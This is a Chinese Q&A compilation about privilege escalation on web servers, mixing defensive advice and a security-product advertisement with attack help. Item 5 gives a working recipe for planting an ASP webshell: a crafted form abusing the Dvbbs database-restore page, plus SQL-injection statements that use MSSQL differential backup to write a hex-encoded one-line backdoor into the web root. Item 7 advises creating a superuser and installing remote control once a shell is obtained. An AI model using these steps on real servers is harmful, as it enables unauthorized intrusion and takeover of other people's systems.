提权服务器

1、服务器被提权怎么办？

为了安全，最好重装系统。装好后打好补丁，再装个服务器入侵防御系统，基本上可以保证服务器安全了。

风云防火墙服务器入侵防护系统功能介绍：（外防 内保）
防御DDOS攻击功能：
1.SYN Flood CC 类攻击，快速设置端口过滤规则,流量统计
2.ARP保护功能，防止数据被嗅探和被修改挂马
服务器入侵防护功能：
3.SQL防注入功能保护服务器所有网站免受入侵烦恼
4.进程保护模式可使木马和病毒拒之门外
5.文件保护模式可使网站文件不被篡改
6.注册表保护模式保护不让安装服务启动和驱动项目
7.系统用户名监控防止黑客新建用户名
8.手机短信通知功能能让你了解服务器安全状态
使用最佳状况表现：打造出一台安全省心免维护的服务器。

2、网站入侵webshell提权~服务器后台~~~急

方法分类
1、黑箱测试
黑箱测试又被称为所谓的“Zero-Knowledge Testing”，渗透者完全处于对系统一无所知的状态，通常这类型测试，最初的信息获取来自于DNS、Web、Email及各种公开对外的服务器。
2、白盒测试
白盒测试与黑箱测试恰恰相反，测试者可以通过正常渠道向被测单位取得各种资料，包括网络拓扑、员工资料甚至网站或其它程序的代码片断，也能够与单位的其它员工（销售、程序员、管理者……）进行面对面的沟通。这类测试的目的是模拟企业内部雇员的越权操作。
3、隐秘测试
隐秘测试是对被测单位而言的，通常情况下，接受渗透测试的单位网络管理部门会收到通知：在某些时段进行测试。因此能够监测网络中出现的变化。但隐秘测试则被测单位也仅有极少数人知晓测试的存在，因此能够有效地检验单位中的信息安全事件监控、响应、恢复做得是否到位。

3、服务器被提权，求网站劫持大神来看看 高分悬赏 不够再加

VPS不是很方便么？直接备份一下数据，然后直接控制面板中摧毁。
被黑了主要可能是某一个网站有提权的漏洞，自己慢慢分析一下吧。

4、VMware 提权 拿到主服务器管理权限？

楼主：

你的问题可以这个改，

我得到一个虚拟机权限，我想得到它的宿主机权限，请各位黑客们帮忙。

你最好先知道宿主机是ESXi，GSX, workstation的哪一种？

5、怎么提权并拿下服务器？

1.试试在后台能不能修改配置文件，修改上传文件的类型，能的话就填加asp文件
2.如果是asp+mssql系统，这里需要提一点动网mssql版，但是可以直接本地提交来备份的。首先在发帖那上传一个写有asp代码的假图片，然后记住其上传路径。写一个本地提交的表单，代码如下：

＜form action=http://网站/bbs/admin_data.asp?action=RestoreData&act=Restore method="post"＞

＜p＞已上传文件的位置：＜input name="Dbpath" type="text" size="80"＞＜/p＞

＜p＞要复制到的位置：＜input name="backpath" type="text" size="80"＞＜/p＞

＜p＞＜input type="submit" value="提交"＞＜/p＞ ＜/form＞

另存为.htm本地执行。把假图片上传路径填在“已上传文件的位置”那里，想要备份的WebShell的相对路径填写在“要复制到的位置”那里，提交就得到我们可爱的WebShell了，恢复代码和此类似，修改相关地方就可以了。没有遇到过后台执行mssql命令比较强大的asp程序后台，动网的数据库还原和备份是个摆设，不能执行sql命令备份webshell，只能执行一些简单的查询命令。可以利用mssql注入差异备份webshell，一般后台是显示了绝对路径，只要有了注入点基本上就可以差异备份成功。下面是差异备份的主要语句代码，利用动网7.0的注入漏洞可以用差异备份一个webshell，可以用利用上面提到的方法，将conn.asp文件备份成.txt文件而获得库名。

差异备份的主要代码：

;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s--

;Drop table [heige];create table [dbo].[heige] ([cmd] [image])--

;insert into heige(cmd) values()--

;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--

这段代码中，0x626273是要备份的库名bbs的十六进制，可以是其他名字比如bbs.bak; 是＜%execute request("l")%＞的十六进制，是lp最小马；0x643A5C7765625C312E617370是d:\web\1.asp的十六进制,也就是你要备份的webshell路径。当然也可以用比较常见备份方式来获得webshell，唯一的不足就是备份后的文件过大，如果备份数据库中有防下载的的数据表，或者有错误的asp代码，备份出来的webshell就不会成功运行，利用差异备份是成功率比较高的方法，并且极大的减少备份文件的大小。

由于不知道你那的具体情况，是能随便找了点东西给你，希望能帮到你

6、想提权一台服务器，其他的搞定了，但是服务器装有安全狗，加不了账户到管理组，shift后门也被限制了

服务器安全狗主动防御模块中有账户保护功能，除非你能够关闭掉服务器安全狗的防护功能。否则是没办法创建的。而且安全狗软件可以设置启动密码，所以即便知道是被服务器安全狗保护住了，想关闭保护功能没密码的情况下也是关不掉的。

另外，一旦服务器上还装有网站安全狗，那样想上传木马文件都没办法了。3.5beat版的网站安全狗还增加了防中国菜刀连接的功能和网站后台登陆保护功能，这狗要逆天了。。。

放弃吧，基本没希望搞定的

请采纳，谢谢

7、拿到webshell后如何提权拿下他的服务器？

有了shell,建超级用户，安装远程控制服务端，从客户端连接进行控制服务器。